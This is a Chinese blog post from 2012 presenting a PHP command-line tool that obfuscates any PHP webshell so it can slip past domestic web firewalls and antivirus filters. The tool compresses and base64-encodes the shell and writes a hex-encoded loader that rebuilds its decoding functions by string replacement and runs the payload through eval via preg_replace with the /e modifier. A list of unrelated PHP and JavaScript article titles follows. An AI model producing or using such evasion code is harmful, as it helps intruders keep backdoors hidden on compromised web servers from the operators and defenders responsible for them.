php shell超强免杀、减少体积工具实现代码


Posted in PHP onOctober 16, 2012

lostwolf写的
这不是webshell,只是个webshell免杀工具
切勿当初webshell使用
仅限免杀phpwebshell
该工具运行在 cli 模式!
如果有无法突破的文件内容过滤 可尝试下用这个工具 免杀大马!
任意php webshell 通过此工具编码之后可以饶过国内一些bt的防火墙

<?php 
/* 
Title: PHP shell nokill T00L 
Blog: exploit-db.blogcn.com 
*/ 
error_reporting(0); 
@ini_set('memory_limit','-1'); 
set_time_limit(0); 
$toolname="$argv[0]"; 
if ($argc<2) { 
baner($toolname); 
die; 
} 
$input_file= trim($argv[1]); 
$output_file='nokill_'.$input_file; 
if (file_exists($input_file)) { 
No_kill_c0de($input_file,$output_file); 
echo "PHP shell nokill T00L\r\n"; 
echo "Blog: exploit-db.blogcn.com\r\n"; 
echo "Input: {$input_file}\r\n"; 
$file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file; 
echo "[+] Generate success!\r\n"; 
echo "Saved to {$file_full_path}"."\r\n"; 
} else { 
echo "PHP shell nokill T00L\r\n"; 
echo "Blog: exploit-db.blogcn.com\r\n"; 
die("[-] Failed ! The File $input_file does not exist"); 
} 
function No_kill_c0de($input_file,$output_file){ 
$no_whitespace=php_strip_whitespace($input_file); 
$no_php_tag=trim(trim(trim($no_whitespace,'<?php'),'<?'),'?>'); 
$enfile=base64_encode(gzdeflate($no_php_tag)); 
$shellcode="\x3c\x3f\x70\x68\x70\xd\xa"; 
$shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."\xd\xa"; 
$shellcode.="\x24\x62\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x66\x27\x2c\x22\x22\x2c\x22\x62\x66\x61\x66\x73\x66\x65\x66\x36\x66\x34\x66\x5f\x66\x66\x64\x66\x66\x65\x66\x66\x63\x66\x66\x6f\x66\x66\x64\x66\x66\x65\x66\x22\x29\x3b\xd\xa\x24\x67\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x58\x27\x2c\x27\x27\x2c\x27\x67\x58\x58\x7a\x58\x58\x69\x58\x58\x6e\x58\x58\x58\x58\x66\x58\x58\x58\x6c\x58\x58\x61\x58\x58\x58\x74\x58\x58\x58\x58\x58\x65\x27\x29\x3b\xd\xa\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x5c\x27\x61\x5c\x27\x65\x69\x73\x27\x2c\x27\x65\x27\x2e\x27\x76\x27\x2e\x27\x61\x27\x2e\x27\x6c\x27\x2e\x27\x28\x24\x67\x28\x24\x62\x28\x24\x65\x6e\x66\x69\x6c\x65\x29\x29\x29\x27\x2c\x27\x61\x27\x29\x3b\xd\xa"; 
$shellcode.="\x3f\x3e"; 
file_put_contents("$output_file",$shellcode); 
} 
function baner($toolname){ 
echo "PHP shell nokill T00L\r\n"; 
echo "Blog: exploit-db.blogcn.com\r\n"; 
echo "Usage: {$toolname} phpwebshell\r\n"; 
} 
?>
PHP 相关文章推荐
PHP+DBM的同学录程序(2)
Oct 09 PHP
推荐个功能齐全的发送PHP邮件类
Jan 03 PHP
PHP 编写的 25个游戏脚本
May 11 PHP
php 无法载入mysql扩展
Mar 12 PHP
PHP setcookie设置Cookie用法(及设置无效的问题)
Jul 13 PHP
分享下PHP register_globals 值为on与off的理解
Sep 26 PHP
PHP时间戳 strtotime()使用方法和技巧
Oct 29 PHP
使用php记录用户通过搜索引擎进网站的关键词
Feb 13 PHP
PHP利用MySQL保存session的实现思路及示例代码
Sep 09 PHP
PHP验证码类ValidateCode解析
Jan 07 PHP
4种Windows系统下Laravel框架的开发环境安装及部署方法详解
Apr 06 PHP
详解PHP设计模式之依赖注入模式
May 25 PHP
PHP中替换换行符的几种方法小结
Oct 15 #PHP
php变量范围介绍
Oct 15 #PHP
php模板函数 正则实现代码
Oct 15 #PHP
php mssql扩展SQL查询中文字段名解决方法
Oct 15 #PHP
PHP获取文件后缀名的三个函数
Oct 15 #PHP
php标签云的实现代码
Oct 10 #PHP
域名和cookie问题(域名后缀)
Oct 10 #PHP
You might like
PHP5.3.1 不再支持ISAPI
2010/01/08 PHP
PHP+Ajax实时自动检测是否联网的方法
2015/07/01 PHP
php set_include_path函数设置 include_path 配置选项
2016/10/30 PHP
详解PHP如何更好的利用PHPstorm的自动提示
2017/08/18 PHP
PHP判断是否是微信打开,浏览器打开的方法
2018/03/14 PHP
PHP实现的mysql读写分离操作示例
2018/05/22 PHP
微信公众号开发之获取位置信息php代码
2018/06/13 PHP
关于恒等于(===)和非恒等于(!==)
2007/08/20 Javascript
Javascript计算两个marker之间的距离(Google Map V3)
2013/04/26 Javascript
使用JQ来编写最基本的淡入淡出效果附演示动画
2014/10/31 Javascript
javascript实现根据身份证号读取相关信息
2014/12/17 Javascript
使用Script元素发送JSONP请求的方法
2016/06/12 Javascript
第一次接触神奇的前端框架vue.js
2016/12/01 Javascript
jQuery实现在新增加的元素上添加事件方法案例分析
2017/02/09 Javascript
Javascript中八种遍历方法的执行速度深度对比
2017/04/25 Javascript
jQuery实现可拖动进度条实例代码
2017/06/21 jQuery
nodejs async异步常用函数总结(推荐)
2017/11/17 NodeJs
小程序实现列表删除功能
2018/10/30 Javascript
vue引入微信sdk 实现分享朋友圈获取地理位置功能
2019/07/04 Javascript
Vue 中如何将函数作为 props 传递给组件的实现代码
2020/05/12 Javascript
JS可断点续传文件上传实现代码解析
2020/07/30 Javascript
vue+vant 上传图片需要注意的地方
2021/01/03 Vue.js
[01:07:47]Secret vs Optic Supermajor 胜者组 BO3 第一场 6.4
2018/06/05 DOTA
在 Python 应用中使用 MongoDB的方法
2017/01/05 Python
Python cookbook(数据结构与算法)将名称映射到序列元素中的方法
2018/03/22 Python
python使用wxpy轻松实现微信防撤回的方法
2019/02/21 Python
Python实现插入排序和选择排序的方法
2019/05/12 Python
Django框架使用mysql视图操作示例
2019/05/15 Python
keras用auc做metrics以及早停实例
2020/07/02 Python
selenium+超级鹰实现模拟登录12306
2021/01/24 Python
我们是伦敦女孩:WalG
2018/01/08 全球购物
商得四方公司面试题(gid+)
2014/04/30 面试题
儿科护理实习自我鉴定
2013/09/19 职场文书
经典婚礼主持开场白
2014/03/13 职场文书
房产分割协议书范文
2014/11/21 职场文书
SpringMVC 整合SSM框架详解
2021/08/30 Java/Android